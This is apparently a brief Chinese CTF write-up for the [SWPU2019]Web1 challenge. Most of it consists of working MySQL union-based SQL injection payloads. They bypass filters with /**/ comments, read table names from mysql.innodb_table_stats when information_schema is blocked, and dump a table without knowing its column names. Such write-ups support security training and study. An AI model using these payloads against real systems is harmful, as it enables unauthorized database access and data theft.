周末不用上班,刷题刷题
[SWPU2019]Web1
'闭合,空格可以用/**/
a'/**/union/**/select/**/1,2,3' 显示The used SELECT statements have a different number of columns
-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'出现回显
因为or过滤了,这里无法使用information_schema
查看当前用户:
-1'/**/union/**/select/**/1,(select/**/current_user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'
显示是
root@localhost
-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'
获得表名:ads,users
猜测flag在users里面,users三列
-1'/**/union/**/select/**/1,((select/**/group_concat(c)/**/from/**/(select/**/1,2,3/**/c/**/union/**/select/**/*/**/from/**/users)b)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'
获得flag